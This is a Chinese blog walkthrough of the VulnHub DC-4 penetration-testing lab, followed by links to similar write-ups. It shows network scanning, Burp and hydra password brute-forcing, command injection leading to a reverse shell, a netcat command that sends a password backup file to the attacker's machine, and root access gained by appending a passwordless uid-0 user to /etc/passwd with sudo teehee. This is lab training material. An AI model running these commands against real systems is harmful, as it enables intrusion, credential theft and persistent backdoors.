DC-4靶场实战

最新推荐文章于 2024-08-02 09:09:50 发布
最新推荐文章于 2024-08-02 09:09:50 发布
阅读量949 收藏 31
点赞数 21
文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42754807/article/details/137179294
版权

前言


  这次的靶机是vulnhub下的DC-4,下载地址为DC: 4 ~ VulnHub,老样子,下载解压后用VMware打开,设置网络适配器为nat模式

一.准备工作

  输入命令用来探测靶机的ip地址

arp-scan -l

可知靶机的ip地址是192.168.188.138

输入命令

 nmap -A -sV -p- --min-parallelism 100 192.168.188.138

可知靶机开放了22端口和80端口

输入ip地址到浏览器上,弹出了一个登陆页面

暂时还没有其他思路,可以先爆破看看网站有没有其他页面

输入命令

dirsearch -u 192.168.188.138

  发现了一个值得关注的页面,command.php,这里面可能存在一些配置命令,但是输入这个页面地址会直接跳转到index.php页面

没有头绪,试试看能否通过暴力破解来破解出用户名和密码,打开burpsuite

二.Bp暴力破解

打开bp,进入代理,开启拦截请求,并且在选项里面添加一个拦截命令,设置端口号为8080,绑定地址为所有接口,一定要勾选启动中

打开kali上的火狐浏览器,在setting里面搜索proxy,设置代理

注意:ip地址为物理机上的ip地址

这样物理机上的bp就能拦截kali上的请求了

随便在网站页面输入用户名和密码,可以看到bp成功拦截到了请求包

点击鼠标右键,点击发送给Intruder

然后依次点击测试器->位置->清除$,然后将鼠标对准到password=123456末尾,点击添加$,

可以发现两边多了$符号,说明在之后的破解中,这个字符串,会被字典中的字符所代替

这里的字典选择kali自带的john 所用的字典,关于john的使用可以参考我前面的博客

所用的字典路径是/usr/share/john/password.lst,将字典里的内容保存下来,存放为password.txt

然后依次点击,将复制好的字典文件上传上去

配置好后,点击开始攻击

攻击完成后,点击按长度排序,得到最长的一个就是破解出的密码了

三.登录网站后台

  已经得到了网站的用户名和密码,登录进去,点击command

   随意点击命令可以看到每次显示的页面都不一样,猜测这是一个命令注入,并且是可以通过参数进行控制的

继续使用bp进行抓包,然后对其改包。

可以发现,将其改成id后,可以成功弹出当前的用户

四.建立shell

   先在本地新建一个监听端口

然后通过bp将包改成如下图所示,注意:ip地址为kali的本地ip地址

可以看到已经成功连接了

升级成一个交互式的shell

python -c'import pty;pty.spawn("/bin/bash")'

五.提权

  现在已经成功建立shell了,下一步就是提权,也就是成为root用户,提取flag,先试下suid提权

输入命令

find / -perm -u=s -type f -exec ls -la {} \; 2>/dev/null

发现并没有什么可以提权的文件,去家目录看看有没有什么敏感文件

在jim用户下找到了一个mbox和old-passwords.bak,但是发现没有权限打开mbox,先将old-passwords.bak下载到本地

   通过nc把old-passwords.bak下载下来,准备用于ssh的暴力破解。首先在本地用nc监听一个端口 4445,并把监听到的数据写入pass.txt

然后在靶机中用nc将old-passwords.bak上传到本地主机

输入命令

nc 192.168.188.128 4445 < old-passwords.bak

发现已经上传成功,此时采用hydra进行爆破,用户名在家目录已经知道了,分别是charles,jim,sam,将其保存为user.txt

输入命令

hydra -L user.txt -P pass.txt ssh://192.168.188.138 -t 64 -o result.txt

-L 指定用户名文件

-P 执行密码字典文件

ssh:// 代表使用ssh协议

-t 代表线程数,最高为64线程。

-o 代表将破解结果输出到指定文件内。

hydra更详细的用法可以参考:https://blog.csdn.net/qq_17204441/article/details/90436483

攻击完成后,打开result.txt,发现用户名jim和其对应的密码jibril04

使用jim进行ssh登录

使用sudo -l进行提权看看,发现不行

老样子去找找看有没有什么敏感文件

没有什么特别的文件

经过一番寻找,终于在/var/mail里面发现了一个特别的邮件,邮件是charles发给jim的,并且还给了charles的密码^xHhA&hvim0y

切换到charles用户

发现charles可以执行sudo -l命令,可以以root用户运行teehee

在文心一言上搜索了下teehee的用法

首先我们来了解/etc/passwd的格式,以root为例

root:x:0:0:root:/root:/bin/bash

字段1: 用户名。

字段2:密码占位符,x代表有密码。

字段3:用户的uid,如果一个用户uid为0则表示该用户超级管理员。

字段4:用户的gid,也就是所属用户组的id。

字段5:用户信息(弃用)。

字段6:用户家目录。

字段7:用户登陆系统后使用的shell。

因此我们可以输入命令

echo "tp1679::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

将tp1679这个用户追加到/etc/passwd后面,使其具有root权限

发现,当切换到tp1679时,所显示的就是root权限了,终于可以得到最终的flag了

tp1679
关注
DC系列漏洞靶场-渗透测试学习复现(DC-4)
W983079520的博客
12-02 1279
DC-4是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了exim4漏洞提权。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.145为DC-4靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口有两个:22(SSH服务默认端口)和80(http默认端口)。 4 访
DC-6靶场
qq_49518993的博客
08-31 1245
DC-6靶场
vulnhub靶机之DC-4
m0_52328368的博客
08-19 1182
vulnhub之dc-4详细步骤
DC系列靶场---DC 4靶场的渗透测试
最新发布
zhouA0221的博客
08-02 797
可以看到使用teehee提权,teehee就是tee的变体从标准输入读取并写入标准输出和文件我们可以借助teehee往passwd写入一个root账号即可得到root权限查看一下这个命令的帮助手册,使用-a参数在/etc/passwd文件里面新建一个有管理员权限的用户。因为我使用的字典文件很大,我们这时候可以根据长度来分辨哪个是密码,因为正确密码只有一个,我们可以点length来区分真密码,我们看到密码是happy。4、在做提权没有思路的时候,我们还是要进行信息收集,通过信息收集获得更多提权的方式。
DC4靶场
m0_62438849的博客
03-09 1013
例如,网站可能是由静态文件组成,不需要后端数据库或复杂的CMS来管理内容。每个有效负载集都可以使用各种有效负载类型,并可以以不同的方式自定义每种负载类型。Payload type(负载类型):较为常用的有Simple list(简单列表)、Runtime file(运行文件)等。所谓“无法登录”,指的是仅是这个用户无法使用bash或者其他shell来登录系统而已,并不是说这个账号就无法使用系统资源。系统账号的shell使用/sbin/nologin,此时无法登录系统,即时给了密码也不行。
靶场DC-4
好好学习
11-28 748
每个靶场其实都多多少少能学到新东西,但时间久了,不用可能会忘记,因此写下来以作为记录。实际渗透环境复杂得多,所以靶场其实是一个练兵场。举一反三才重要!针对DC系列的靶场,其实最终目标都是获取root下的flag,来吧,继续整吧。
DC-4靶场渗透】
一纸荒芜的博客
07-04 2153
DC-4渗透
vuInhub靶场实战系列-DC-4实战
05-22
vuInhub靶场实战系列-DC-4实战
vuInhub靶场实战系列-DC-6实战
05-29
vuInhub靶场实战系列-DC-6实战
DC-1靶场搭建及渗透
weixin_55772865的博客
06-13 611
回到/var/www目录下,执行加密脚本 cd ../ php scripts/password-hash.sh 666。1.回到该靶场的根目录下,在scripts目录下存在hash密码加密脚本password-hash.sh。4.扫描192.168.75.129发现就是我们要找的dc-1,且开放80端口,尝试访问一下。首先查找有suid权限的文件,发现find命令有suid权限,那就利用find命令进项提权。4.更新后用户名:admin 密码:666,去开放的80端口网页访问。
靶机DC-4—WP
m0_66638011的博客
06-22 1058
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试。DC-4靶场攻破过程:1.首先我们进行主机发现,将测试机的网站进行了指纹扫描,发现它没有任何框架。2.然后我们进行bp抓包,发现了暴力破解漏洞。
dc-4靶机练习.docx
01-02
第一步;靶机在web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新用户的登陆口令。 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有root权限
DC-4靶机
mlws1900的博客
03-24 1204
下载不下来用迅雷下载。
靶机 DC-4
m0_66299232的博客
09-19 352
hydra -L user.txt -P password.txt ssh://192.168.166.133 //-L,-P 都是大写。4.可以看到在/home/jim/backups目录下存在文件old-passwords.bak,可能是密码的备份文件。1.查看存活主机,根据分析得出 192.168.166.133是DC-4靶机IP地址。5.teehee这个root用户不需要密码就能登录,直接拿flag,轻松拿下4.发现了另外一个账户,并且文中有该账户的密码。既然我们获得了旧密码,也获得了账户。命令执行
DC4-靶机
Au
08-25 3553
下载地址 配置的环境: kali:192.168.25.131 DC4 -靶机 和 kali 在同一C段 渗透 nmap扫描网段,发现存活主机 nmap -sP 192.168.25.0/24 发现主机192.168.25.134,判定为DC3-靶机,继续使用nmap获取详细信息 nmap -A -p 1-65535 192.168.2...
Vulnhub靶场渗透-DC-4
paidx0
10-21 273
前言 靶机IP(192.168.110.134) 攻击机IP(192.168.110.127) 网络NAT模式 信息收集 访问80端口,提示以admin的用户名登录 直接爆破了,爆破结果是 admin:happy 漏洞利用 登录进去发现是个可以RCE的 思路是不是来了,很显然直接弹shell了 怎么弹shell就不多说了,我的靶场笔记很多都有写 存在三个用户 进入jim的backups文件夹发现了很多的旧密码,思路这不就又来了 开放ssh服务,很显然是要我们去爆破了 拿到jim的账号了,登
DC4靶机
小小猪的博客
06-10 449
DC4靶机 实验环境 靶机:kali 目标机:DC-4 实验工具:burpsuite 实验步骤 arp-scan -l扫描主机ip地址 nmap扫描开的端口 进行访问80,需要输入密码 hydra -l admin -P /usr/share/wordlists/rockyou.txt x.x.x.161 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F 进行密码爆破 这里注
vulnhub DC4 靶场练习
鸥鹭忘机
08-16 659
前言 这次练习的靶机是vulnhub平台下的DC系列靶机第四台,下载地址为https://www.vulnhub.com/entry/dc-4,313/。该靶机的难度系数为简单,拿下该靶机的关键就是需要收集信息,最终目的是获取root权限。 虚拟机配置 这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击DC-4靶机,然后选中配置。依次点击网络配置->NAT模式->高级->生成,然后确认即可。 然后需要溢出CD/DVD选项,这个启动时候会自动检测并连接
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值